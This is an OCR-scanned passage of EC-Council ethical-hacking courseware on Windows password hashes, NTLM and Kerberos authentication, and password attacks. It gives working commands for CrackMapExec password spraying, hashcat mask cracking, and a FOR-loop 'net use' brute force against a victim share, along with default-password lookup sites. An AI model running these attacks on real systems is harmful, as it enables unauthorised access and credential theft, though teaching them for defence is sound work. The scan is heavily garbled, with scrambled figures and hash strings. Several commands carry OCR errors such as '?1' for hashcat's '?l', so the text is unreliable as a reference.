BE4OC450AB9971 3DFLEDCSB40C25AD47:

Martin:1002:NO

PASSWORD****#*# #4

kkk

: BFAA50 2DA294ACBC17 5B394A080DEE79

Juggyboy:1003:NO

Jason:1004:NO

PASSWORD*******##e## ee RHEE 2 ABBCDCDD22253127 93ED6967B28C1025:

PASSWORD** #4 i ii ee eH

[fo PASSWORD* ARR aaa AHHH)

voeyv

Username

User ID

3:

HK: 2D20D25 247 9F48SCDF5E171D9398 SBE:

CBO948305E797TBEZA82807973B8953 5 : +

v

v

LM Hash

NTLM Hash Figure 6.3: SAM file

Note: LM hashes are disabled in Windows Vista and later Windows OSs; LM is blank in those systems.

Module 06 Page 588

Ethical Hacking and Countermeasures Copyright © by EC-Cot All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

NTLM Authentication Process

CE H Windows Domain Controller

eon

User types password into logon window

‘Windows runs

password through

hash algorithm,

Domain controller has a stored copy of the user's hashed password hash

Shiela: 1005:NO PASSWORD****

wn Shiela:

1005:NO

saeeeeeeenaaenees :0CB694880 SE797BE2A82807973889537:

PASSWORD****

seeseesseenneeescoae3t080

DC compares computer's response with the response it created with its own hash

Computer sends response to challenge Note: Microsoft has upgraded its default authentication protocol to Kerberos, which provides stronger authentication for client/server applications than NTLM.

NTLM Authentication Process NTLM includes three methods of challenge-response authentication: LM, NTLMv1, and NTLMv2, all of which use the same technique for authentication. The only difference between them is the level of encryption. In NTLM authentication, the client and server negotiate an authentication protocol. This is accomplished through the Microsoft-negotiated Security Support Provider (SSP).

=| User types password

Into logon window

Windows runs

password through hash algorithm

Client Computer

Windows Domain Controller

Fy

Domain controller has a stored copy

Shiela

of the user's hashed password

por rrr tress

Shiela:1005:NO PASSWORD*:

Mach

Alport ®

Shiela:1005:No PAssWorD+++

ionenneaaenasae+4; OCB6I4880 5F797BE2A62007973B89537

seeeseussaeeens4s:0CB694880

5F797BF2A82807973B89537:

|

: :

DC compares computer's

response with the response it created with its own hash } ifthey match, logonis a

E success

Computer sends response to challenge

Aa

r8

ppq

kgj89

par

Figure 6.4: NTLM authentication process

The following steps demonstrate the process and the flow of client authentication to a domain controller using any NTLM protocol:

=

The client types the username and password into the logon window.

Module 06 Page 589

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

=

Windows runs the password through a hash algorithm and generates a hash for the password that is entered in the logon window.

=

The client computer sends a login request along with a domain controller.

=

The domain controller generates a 16-byte random which it sends to the client computer.

=

The client computer encrypts the nonce with a hash of the user password and sends it back to the domain controller.

=

The domain controller retrieves the hash of the user password from the SAM and uses it to encrypt the nonce. The domain controller then compares the encrypted value with the value received from the client. A matching value authenticates the client, and the logon is successful.

name

to the domain

character string called a “nonce,”

Note: Microsoft has upgraded its default authentication protocol to Kerberos, which provides a stronger authentication for client/server applications than NTLM.

Module 06 Page 590

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Kerberos Authentication

CE H Key Distribution Center (KDC)

User request to the authentication server t...>) v

Reply of authentication server to the user request

> Replyof the TGS to the client’s request

Authentication Server (AS)

|

. til

Database

=



client is expecting

Application Server Figure 6.5: Kerberos authentication process

Kerberos employs the KDC, which a trusted third party, and consists of two logically distinct parts: an AS and a TGS. The authorization mechanism of Kerberos provides the user with a ticket-granting ticket (TGT) that serves post-authentication for later access to specific services, Module 06 Page 591

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Single Sign-On via which the user need not re-enter the password again to access any authorized services. Notably, there is no direct communication between the application servers and the KDC; the service tickets, even if packed by TGS, reach the service only through the client who is willing to access them.

Module 06 Page 592

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Password Cracking ‘@

CE H

Password cracking techniques are used to recover passwords from computer systems

‘@

Attackers use password cracking techniques to gain unauthorized access to

©

Most of the password cracking techniques are successful because of weak

vulnerable systems

_ a)

Baan

or easily guessable passwords

Password Cracking Password cracking is the process computer system or from the data help a user recover a forgotten administrators to check for easily unauthorized system access.

of recovering passwords from the data transmitted by a stored in it. The purpose of cracking a password might be to or lost password, as a preventive measure by system breakable passwords, or for use by an attacker to gain

Hacking often begins with password-cracking attempts. A password is a key piece of information necessary to access a system. Consequently, most attackers use password-cracking techniques to gain unauthorized access. An attacker may either crack a password manually by guessing it or use automated tools and techniques such as a dictionary or a brute-force method. Most password-cracking techniques are successful because of weak or easily guessable passwords.

Module 06 Page 593

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Types of Password Attacks .

ig iE H

The attacker does not need technical knowledge to crack the password, hence it is known

Non-Electronic | asa non-technical attack Attacks Shoulder Sutng Social Engncerng Active Online

Attacks

Passive Online

Attacks

Offline Attacks

© Dumpster Oving

The attacker performs password cracking by directly communicating with the victim’s machine © Dictionary, Brute Forcing, and Rule-based Attack

© Trojan/Spyware/Keyloggers

© Hash Injection Attack/Mask Attack © ULMNR/NBT-NS Poisoning

© Password Guessing/Spraying © Internal Monologue Attack

© Cracking Kerberos Passwords

The attacker performs password cracking without communicating with the authorizing party ©

Wire Sniffing

@

Man-in-the-Middle Attack

©

Replay Attack

The attacker copies the target’s password file and then tries to crack passwords on his own | systemat.a different location © Rainbow Table Attack (Pre-Computed Hashes)

© Distributed Network Attack

Types of Password Attacks Password cracking is one of the crucial stages of system hacking. Password-cracking mechanisms often exploit otherwise legal means to gain unauthorized system access, such as recovering a user’s forgotten password. Classification of password attacks depends on the attacker’s actions, which are of the following four types: Non-Electronic Attacks: This is, for most cases, the attacker’s first attempt at gaining target system passwords. Non-electronic or non-technical attacks do not require any technical knowledge about hacking or system exploitation. Techniques used to perform non-electronic attacks include shoulder surfing, social engineering, dumpster diving, etc. Active Online Attacks: This is one of the easiest ways to gain unauthorized administrator-level system access. Here, the attacker communicates with the target machine to gain password access. Techniques used to perform active online attacks include password guessing, dictionary and brute-forcing attacks, password spraying, mask attack, hash injection, LLMNR/NBT-NS poisoning, use of Trojans/spyware/keyloggers, internal monologue attacks, Markov-chain attacks, Kerberos password cracking, etc.

Passive Online Attacks: A passive attack is a type of system attack that does not lead to any changes in the system. In this attack, the attacker does not have to communicate with the system, but passively monitor or record the data passing over the communication channel, to and from the system. The data are then used to break into the system. Techniques used to perform passive online attacks include wire sniffing, man-in-the-middle attacks, replay attacks, etc.

Module 06 Page 594

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking =

Exam 312-50 Certified Ethical Hacker

Offline Attacks: Offline attacks refer to password attacks in which an attacker tries to recover cleartext passwords from a password hash dump. Attackers use pre-computed hashes from rainbow tables to perform offline and distributed network attacks.

Module 06 Page 595

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Non-Electronic Attacks Social

Engineering @

C iE H

=

Convincing people to reveal passwords

——,

‘@

Shoulder

Surfing

a

——\

Looking at either the

‘@

user’s keyboard or screen while he/she is logging in

Dumpster

Diving

Searching for sensitive information in the user’s trash-bins, printer trash bins, and in/on the user’s

desk for sticky notes

Copyright © by

Non-Electronic Attacks There are three dumpster diving.

types

of non-electronic

attacks:

social

engineering,

shoulder

surfing,

and

Social Engineering

In computer security, social engineering is used to denote a non-technical type of intrusion that exploits human behavior. Typically, it heavily relies on human interaction and often involves tricking other people into breaking normal security procedures. A social engineer runs a “con game” to break security procedures. For example, an attacker using social engineering to break into a computer network might try to gain the trust of the authorized user to access the target network and then extract information to compromise network security. Social engineering is, in effect, a run-through used to procure confidential information by deceiving or swaying people. An attacker can disguise himself/herself as a user or system administrator to obtain the user’s password. Social engineers exploit the fact that people, in general, try to build amicable relationships with their friends and colleagues and tend to be helpful and trusting. Another trait of social engineering relies on the inability of people to keep up with a culture that relies heavily on information technology. Most people are unaware of the value of the information they possess, and as such, only a handful care about protecting their information. Social engineers typically search dumpsters to acquire valuable information. Furthermore, social engineers find it more challenging to obtain the

combination to a safe, or a health-club locker, as compared to the case of a password. The best defense is to educate, train, and create awareness about this attack and the value of information.

Module 06 Page 596

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

=

Exam 312-50 Certified Ethical Hacker

Shoulder Surfing Shoulder surfing is a technique of stealing passwords by hovering near the legitimate users and watching them enter their passwords. In this type of an attack, the attacker observes the user’s keyboard or the screen as they log in, and monitors what the user refers to when entering their password, for example, an object on their desk for written passwords or mnemonics. However, this attack can be performed only when the attacker is in close proximity to the target. This attack can also be performed in the checkout lines of grocery stores, for example, when a potential victim swipes a debit card and enters the required PIN (Personal Identification Number). A PIN typically has four digits, and this renders the attack easy to perform.

=

Dumpster Diving

“Dumpster diving” is a key attack method that employs significant failures in computer security in the target system. The sensitive information that people crave, protect, and devotedly secure can be accessed by almost anyone willing to perform garbage searching. Looking through the trash is a type of low-tech attack with numerous implications. Dumpster diving was quite popular in the 1980s. The term itself refers to the collection of useful, general information from waste dumps such as trashcans, curbside containers, and dumpsters. Even today, curious and/or malicious attackers sometimes find discarded media with password files, manuals, reports, receipts, credit card numbers, or other sensitive documents. Examination of waste products from dumps can help attackers in gaining unauthorized access to the target systems, and there is ample evidence to support this concept. Support staff often dump sensitive information without heeding to who may be able to access it later. The information thus gathered can then be used by attackers to perform other types of attacks, such as social engineering.

Module 06 Page 597

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Active Online Attacks: Dictionary, Brute-Force, and

cE H

ce ne

Rule-based Attack

Dictionary Attack

Brute-Force Attack

Rule-based Attack

@ Adictionary file is loaded

@ The program tries every

——



into the cracking application that runs against user accounts

combination of characters until the password is broken



@ This attack is used when the attacker gets some information about the password

see

‘'— Al RightsReserved. Reproduction

Active Online Attacks: Password Spraying Attack and

¢ IE H

emf

Mask Attack

Password Spraying Attack

Mask Attack

and crack @ Attackers target multiple user accounts simultaneously the passwords using a small set of commonly used passwords

© Attackers recover passwords from hashes with a specific set of characters based on some

the password spraying @ Attackers use CrackiMapExec to automate processto crack domain or workgroup members’ passwords

‘etes/aithab com

Module 06 Page 598

information known to the attacker

© Attacker use hashcat to performa mask attack

https:/fasheat.net Al Rights Reserved. Reproduction is

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Active Online Attacks: Password Guessing

CEH

The attacker creates a list of all possible

Frequency of attacksis less

passwords from the information collected

through social engineering or any other way and manually inputs them on the victim’s machine to crack the passwords

Find a valid user

Create a list of 7

possible passwords

Failure rate is high

Rank passwords pi from high to low

Key in each password, until the ,

Probabaty

discovered

babilit

correct password

Default Passwords

is

CE H

@ A default password isa password supplied by the manufacturer with new equipment(e.g., switches, hubs, routers) that is password protected @ Attackers use default passwords presentin the list of words or dictionary that they use to perform password guessing attack

PASSuORDS Open Sez Me! : Passwords

Online Tools to Search Default Passwords

‘econ Sa ton tm Click heres suse ser ponoe wnae

e https://www.fortypoundhead.com ©

‘oe

ottenoe

© http://www.defaultpassword.us ©

https://www.routerpasswords.com

So

© https://default-password.info

=

© https://192-168-1-1ip.mobi

(ilps Jopen ser me

Module 06 Page 599

https://cirt.net

Al Rights Reserved.

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Active Online Attacks: Trojans/Spyware/Keyloggers

CE H

‘@

The attacker installs a Trojan/Spyware/Keylogger on the victim's machine to collect the victim's usernames

@

The Trojan/Spyware/Keylogger runs in the background and sends back all user credentials to the attacker

and passwords

‘Attacker infects victim's local PC

Attacker

Victim logs on to the domain server with his/her credenti

Trojan/spyware/keylogger sends login credentialsto attacker

Domain Server

ae

Active Online Attacks: Hash Injection/Pass-the-Hash (PtH) Attack

CE H

@ Ahash injection/Pth attack allows an attacker to inject a compromised hash into a local session and use the hash to validate network resources @ The attacker finds and extracts a logged-on domain admin account hash ‘@

The attacker uses the extracted hash to log on to the domain controller

Logged-on hashes are storedin the SAM file User logs on

Compromises server ia >

User Server {Domain Controller)

Extracts a logged-on domain admin accounthash

Injecta compromised hash User Computer

Module 06 Page 600

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Active Online Attacks: LLMNR/NBT-NS Poisoning

CE H

LLMNR/NBT-NS Spoofing Tool: Responder :

@ LLMNRand NBT-NS are the two main elements of Windows operating systems that are used to perform name resolution for hosts present on the same link

@

The attacker cracks the NTLMv2 hash obtained from the victim’s

@

The extracted credentials are used to log on to the host systemin

authentication process

the network

User performs ‘anyone knows \\otaser

User sends incorrect

Data Server

Nose - NOT FOUND

User

Attacker responds saying that he knows \\ptaServr, accepts NTLMv2 hash and then sends an ERROR MSG

CEH

Active Online Attacks: Internal Monologue Attack

@ Attackers perform an internal monologue attack using SSPI (Security Support Provider Interface) from a user-mode application, where a local procedure call to the NTLM authentication package is invoked to calculatethe NetNTLM. response in the context of the logged-on user Q Crack the NTLM hash using rainbow tables

Q..

a Attacker

Disable the security controls of NetNTLMv1. Interact with NTLM SSP locally to obtain NetNTLMv1 response

e

Restore the security controls of NetNTLMv1.

— Server

Use the cracked hashes

Client y Prohibited.

Module 06 Page 601

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Active Online Attacks: Cracking Kerberos Password AS-REP Roasting (Cracking TGT)

@ Attackers request a TGT fromthe KDC in the form of the an AS-REQ packet and crack the ticket to obtain the user’s password

CEH

Kerberoasting (Cracking TGS)

|@ Attackers request a TGS for the SPN of the target service account and crack the ticket to obtain the user’s password

Domain Controller/ KDC

Domain Controller/ KDC Request TGS Receive TGS.

*@*

crack 16s, obtain re password

Discover user

‘account with pre‘authentication disabled

sexton Applicat

actor

Server

right © by

Active Online Attacks: Pass the Ticket Attack ©

Pass the Ticket is a technique used for

authenticatinga user toa systemthatisusing |) v4. : os : limikatz Kerberos without providing the user's Password

@

CE H

TGT to Mimikatzallows attackers to pass Kerberos

other computersand sign in using the victim’s ticket aplaintext passwords, hashes, © Italso helpsin; extracting PIN codes, and Kerberos tickets from memory

|G To perform this attack, the attacker dumps. Kerberos tickets of legitimate accounts using credential dumping tools (@ The attackerthen launchesa pass the ticket

attackeither by stealing the ST/TGT from an end-user machine, or by stealing the ST/TGT from a compromised Authorization Server |@ The attacker uses the retrieved ticket to gain unauthorized access to the target network services @

Toolssuch as Mimikatz, Rubeus, and Windows

Credentials Editorare used by attackersto launch such attacks

y Prohibited.

Module 06 Page 602

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Other Active Online Attacks

C iE H

Combinator

|

|@ Attackers combine the entriesof one dictionary with those of a second dictionary to generate a new

Fingerprint Attack

|

|@ Attackers break down the passphrase into fingerprints comprising single and multi-character combinations to crack complex passwords

PRINCE Attack

|

@ Itis an advanced version of a combinator attack, where attackers use a single input dictionary to build chains of combined words instead of taking input from two different dictionaries

Toggle-Case

|

|@ Attackers attempt all possible combinations of uppercase and lowercase versions of a word present

Attack

Attack

wordlist to crack the password of the target system

in the input dictionary

| Attackers gather a password database and split each password entry into 2- and 3-character-long Markov-Chain |“ sviiables; using these character elements, a new alphabetis developed, which is then matched with Attack the existing password database

GPU-based Attack

| @ Attackers exploit the OpenGL API on GPUs to set up a spy on the victim device that infers user activities and passwords entered on a browser

Active Online Attacks Dictionary Attack

In this type of attack, a dictionary file is loaded into a cracking application that runs against user accounts. This dictionary is a text file that contains several dictionary words commonly used as passwords. The program uses every word present in the dictionary to find the password. In addition to a standard dictionary, an attackers’ dictionaries contain entries with numbers and symbols added to words (e.g., “3December!962”). Simple keyboard finger rolls (“qwer0987”), which many believe to produce random and secure passwords, are thus included in such a dictionary. Dictionary attacks are more useful than brute-force attacks, however, the former cannot be performed in systems

using passphrases.

This attack is applicable in two situations: o

In cryptanalysis, to discover the decryption ciphertext

key for obtaining the plaintext from a

o

Incomputer security, to bypass authentication and access the control mechanism of the computer by guessing passwords

Methods to improve the success of a dictionary attack: o

Use

of several

different

dictionaries,

such

as technical

and

foreign

dictionaries,

which increases the number of possibilities o

Use of string manipulation along with the dictionary (e.g., if the dictionary contains the word “system,” string manipulation creates anagrams like “metsys,” among others)

Module 06 Page 603

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Brute-Force Attack In a brute-force attack, attackers try every combination of characters until the password is broken. Cryptographic algorithms must be sufficiently hardened to prevent a bruteforce attack, which is defined by the RSA as follows: “Exhaustive key-search, or bruteforce search, is the basic technique for trying every possible key in turn until the correct key is identified.” A brute-force attack is when someone tries to produce every single encryption key for data to detect the needed information. Even today, only those with enough processing power could successfully perform this type of attack.

Cryptanalysis is a brute-force attack on encryption that employs a search of the keyspace. In other words, testing all possible keys is one of the attempts to recover the plaintext used to produce a particular ciphertext. The detection of a key or plaintext that is faster than a brute-force attack is one way of breaking the cipher. A cipher is secure if no method exists to break it other than a brute-force attack. In general, all ciphers are deficient in mathematical proof of security. If the user chooses keys randomly or searches randomly, the plaintext will become available on average after the system has tried half of all the possible keys. Some of the considerations for brute-force attacks are as follows: o.

Itis a time-consuming process

o

All passwords will eventually be found

Rule-based Attack Attackers use this type of attack when they obtain some information about the password. This is a more powerful attack than dictionary and brute-force attacks because the cracker knows the password type. For example, if the attacker knows that the password contains a two- or three-digit number, he/she can use some specific techniques to extract the password quickly. By obtaining useful information, such as the characters have been used, and password required to crack the password and therefore involves brute force, a dictionary, and syllable

method in which numbers and/or special length, attackers can minimize the time enhance the cracking tool. This technique attacks.

For online password-cracking attacks, an attacker will sometimes use a combination of both brute force and a dictionary. This combination falls into the categories of hybrid and syllable password-cracking attacks. o

Hybrid Attack This type of attack depends on the dictionary attack. Often, people passwords merely by adding some numbers to their old passwords. In program would add some numbers and symbols to the words from the try to crack the password. For example, if the old password is “system,” a chance that the person will change it to “system1” or “system2.”

Module 06 Page 604

change their this case, the dictionary to then there is

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking o

Exam 312-50 Certified Ethical Hacker

Syllable Attack

Hackers use this cracking technique when passwords are not known words. Attackers use the dictionary and other methods to crack them, as well as all possible combinations of them. =

Password Spraying Attack Password spraying attack targets multiple user accounts simultaneously using one or a small set of commonly used passwords. Unlike brute-force attacks, which target only specific user accounts, a password spraying attack targets every user within a specific workgroup. To perform this attack, attackers mainly focus on exploiting the account lockout policy, which allows users to use multiple passwords for a certain period or a certain number of attempts before their accounts are locked. Attackers initially attempt a single commonly used password on multiple accounts simultaneously and wait for the response before initiating another password attempt on the same accounts. They continue this process while remaining under the lockout threshold so that they can try a large number of passwords without being affected by automatic lockout mechanisms. Password spraying can be performed at different stages through common ports such as

MSSQL (1433/TCP), SSH (22/TCP), FTP (21/TCP), SMB (445/TCP), Telnet (23/TCP), and Kerberos (88/TCP).

workgroup

Target organization's working group Figure 6.6: Illustration of password spraying attack

Attackers use tools such as CrackMapExec to perform password spraying attacks. o

CrackMapExec

Source: https://github.com Attackers use the CrackMapExec tool to automate the password cracking process of an entire domain or workgroup member passwords using a small set of commonly Module 06 Page 605

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

used passwords stored in a .txt file. The following command executes CrackMapExec tool with the passwords stored in the file passwords.txt: crackmapexec

smb

Run the following command

spraying process:

-u

users.txt

-p

the

passwords.txt

to cross-check whether

lockout occurred

during the

spray.sh -smb

Figure 6.7: Screenshot of CrackMapExec The following are some additional password spraying attack tools:

=

o

Kerbrute (https://github.com)

o

Invoke-DomainPasswordSpray (https://github.com)

o.

Spray (https://github.com)

o

Omnispray (https://github.com)

Mask Attack Mask attack is similar to brute-force attacks but recovers passwords from hashes with a more specific set of characters based on information known to the attacker. Brute-force attacks are time-consuming because the attacker tries all possible combinations of characters to crack the password. In contrast, in a mask attack, the attacker uses a pattern of the password to narrow down the list of possible passwords and reduce the cracking time.

Module 06 Page 606

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking o

Exam 312-50 Certified Ethical Hacker

hashcat Source: https://hashcat.net Attackers use the hashcat tool to perform password attacks such as brute-force attacks, dictionary attacks, and mask attacks. To perform mask attacks, an attacker must know the flags used for the built-in charset, custom charset, and attack mode to create an appropriate pattern for the password. Built-in Charsets The following built-in charset helps specify the type of character to be used: e

?1

=

abcdefghijklmnopqrstuvwxyz

¢

?u

= ABCDEFGHIJKLMNOPQRSTUVWXYZ

e

?d

=

0123456789

e

?h

=

0123456789abcdef

e

?H

=

0123456789ABCDEF

©

?s

= «space»! "#$%&' ()*+,-./:;?2@[\]*_{l}~

e

?a

=

?1?u?d?s

e

?b

=

0x00

-

Oxff

Custom Charset A custom charset is used in situations where the attacker is unsure about the type of character in a particular placeholder: e

-1

abcdefghijklmnopqrstuvwxyz0123456789

e

-1

abcdefghijklmnopgqrstuvwxyz?d

e

-1

210123456789

e

-1

212d

Hash Mode Attackers use the -m flag with hashcat to specify the hash mode, that is, the type of hash to crack, such as MD5, NTML, or SHA256. Run the following command to crack passwords that contain six characters, in which the first three are lowercase alphabets and the last three characters are numbers. The password pattern appears to be ?1?1?1?d?d?d. hashcat

-a

3

-m

0

md5_hashes.txt

?1?71?1?d?d?d

-a > Specifies the attack mode, which is 3 here (brute-force attack) -m > Specifies the hash type, which is 0 here (MD5)

Module 06 Page 607

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

advanced password recovery shcat [

++ hash|hashfile|hccapxfile [dicttonary|mask|dtrectory]...

[ Options ] Type | Descriptio

| Example m 1000 -a3

quiet hex-charset salt wordlist ce tus tus-timer

given tn hex en in hex rdlist are given t

s Num

jin-timeout-abort timeout - abort=300

N

| Se

etween

s

een updat:

Abort if there ts no input from stdin for x Display the st few in a machine-readable format Keep guessing the hash after tt has been cracked e t func ‘0 induct

-disable

tng new markov f runtime

untin

Figure 6.8: Screenshot of hashcat

Run the following command to crack passwords that are eight characters in length, where the first character is either an uppercase or a lowercase letter, the last four characters are digits, the first two digits are 1 and 9, and the remaining characters are lowercase letters. hashcat

-a

3

-m

0

md5_hashes.txt

-1 21?u alphabet

>

Specifies that the character

-1

?1?u

?1?71?1?7119?d?d

is either an uppercase

or a lowercase

To crack a password hash of unknown length, use the --increment providing the maximum and minimum length of the password.

flag

by

hashcat -m 0 -a 3 -i --increment-min=6 --increment-max=10 53ab0df£8ecc7d5a18b4416d00568£02 717171717171717127171

--increment-min=6 --increment-max=10 =

> Minimum length of the password is 6 > Maximum length of the password is 10

Password Guessing Password guessing is a password-cracking technique that involves attempting to log on to the target system with different passwords manually. Guessing is the key element of manual password cracking. The attacker creates a list of all possible passwords from the information collected through social engineering or any other method and tries them manually on the victim’s machine to crack the passwords.

Module 06 Page 608

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

The following are the steps involved in password guessing: o

Finda

valid user

o

Create a list of possible passwords

o

Rank passwords from high to low probability

o

Key in each password, until the correct password is discovered

Hackers can crack passwords manually or by using automated tools, methods, and algorithms. They can also automate password cracking using a simple FOR loop, or create a script file that tries each password in a list. These techniques are still considered manual cracking. The failure rate of this type of attack is high. Manual Password-Cracking Algorithm In its simplest form, this algorithm can automate password guessing using a simple FOR loop. In the example that follows, an attacker creates a simple text file with usernames and passwords and iterates them using the FOR loop. The main FOR loop can extract the usernames and passwords from the text file, which serves as a dictionary as it iterates through every line: [file:

credentials.txt]

administrator

""

administrator

password

administrator

administrator

[Etc.] Type the following commands to access the text file from a directory: c:\>FOR

/F

"tokens=1,2*"

More?

do

More?

2>>nul*

More?

&&

echo

%time%

More?

&&

echo

\\victim.com

c:\>type

net

use

%i

in

(credentials.txt) *

\\victim.com\IPC$

%date%

>> acct:

%j

/u:victim.com\%i*

outfile.txt* %i

pass:

%j

>>

outfile.txt

outfile.txt

The outfile.txt file contains the correct username and password, if the username and password in credentials.txt are correct. An attacker can establish an open session with the victim server using his/her system. Default Passwords Default passwords are those supplied by manufacturers with new equipment (e.g., switches, hubs, routers). Usually, default passwords provided by the manufacturers of password-protected devices allow the user to access the device during the initial setup and then change the password. However, often an administrator will either forget to set the new password or ignore the password-change recommendation and continue using the original password. Attackers can exploit this lapse and find the default password for Module 06 Page 609

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacki ing

Exam 312-50 Certified Ethical Hacker

the target device from manufacturer websites or using online tools that show default passwords to access the target device successfully. Attackers use default passwords in the list of words or dictionary that they use to perform password-guessing attacks. The following are some of the online tools to search default passwords:

©

https://open-sez.me

0

https://www.fortypoundhead.com

o

Attps://cirt.net

0

http://www.defaultpassword.us

o

https://www.routerpasswords.com

o

Ahttps://default-password.info

0.

https://192-168-1-1ip.mobi

PASSWORDS

Open Sez Me! :: Passwords

106 Default Passwords for thousands of systems from 782 vendors!

ast Updated: 12/20/2021 423:35 PM To begin, Select the vendor ofthe product you are lookingfor. Click here to ada new default passwords to this ist

$Top 26 Most Used

*Top 20 Most Used

Neti

Wire

360 Systems

3BB

3Com Accelerated Networks

360 ACCONET

3M Accton

3ware Aceex

Abocom Acer

ACC Acorp

ACTT

Actiontec

Adaptec

Adaptive Micro

ADB

ADC Kentrox

AdComplete.com Adtech

AddTron Adtran

ADIC Advanced

Adobe Advantek Networks

ADP Aerohive

ADT Aethra

Agasio

Agere

AIRAYA

Airlinkio1

Airnet

Airtight Networks

AirVast

‘Airway

Aladdin

Alaxala

Alcatel Lucent

Alcatel

Alfa Network

Alice

Alien Technology

Allied Data

Allied Telesyn

Allied

Allnet

Allot

Alpha

Alteon

Alvarion

Ambicom

Ambit

Amped Wireless

AMI

Amptron

Amigo

AMX

Amino

Andover Controls

AMIT

Anker

Amitech

AOpen

Apache

APC

Apple

ARC Wireless

Arcor

Areca

Arescom

Arlotto

ARRIS:

Arrowpoint

Artem

Asante

Ascend

Ascom

Asmack

Asmax

Aspect

AST

‘Asus

‘AT&T

Atcom

Atheros

Atlantis

Atlassian

Attachmate

Audioactive

Autodesk

Avaya

Avenger News

Passwords

ATM PINs:

Integration

Systems

aoc

System

Figure 6.9: Screenshot showing default passwords

=

Trojans/Spyware/Keyloggers A Trojan is a program that masks itself as appears to perform a desirable or benign harms the system. With a Trojan, attackers operations limited by user privileges on the

Module 06 Page 610

a benign application. The software initially function, but instead steals information or can gain remote access and perform various target computer. Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Spyware is a type of malware that attackers install on a computer to secretly gather information about its users without their knowledge. Spyware hides itself from the user and can be difficult to detect. A keylogger is a program that records all user keystrokes without the user’s knowledge.

Keyloggers ship the log of user keystrokes to an attacker’s machine or hide it in the victim’s machine for later retrieval. The attacker then scrutinizes the log to find passwords or other useful information that could compromise the system. An attacker installs a Trojan/spyware/keylogger on a victim’s machine to collect their usernames and passwords. These programs run in the background and send back all user credentials to the attacker. For example, a key logger on a victim’s computer can reveal the contents of all user emails. The following image depicts a scenario describing how an attacker gains password access using a Trojan/spyware/keylogger. 7)

Attacker! :

Attacker infects victim's local PC with Trojan/spyware/keylogger >

isha ker attacker

;i

Domain- Server

Figure 6.10: Active online attack using Trojan/spyware/keylogger

=

Hash Injection/Pass-the-Hash (PtH) Attack This type of attack is possible when the target system uses a hash function as part of the authentication process to authenticate its users. Generally, the system stores hash values of the credentials in the SAM database/file on a Windows computer. In such cases, the server computes the hash value of the user-submitted credentials or allows the user to input the hash value directly. The server then checks it against the stored hash value for authentication. Le

d-on

Compromises server

hash

ig a local/remote exploit"

Pananrmiapeetate stored in the SAM file seeeeee!j a

3)

User Server

Extracts a logged-on domai admin account hash

(Domain Controller)

ject a compromised hash into a local session User Computer

Attacker Figure 6.11: Hash injection attack

Module 06 Page 611

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

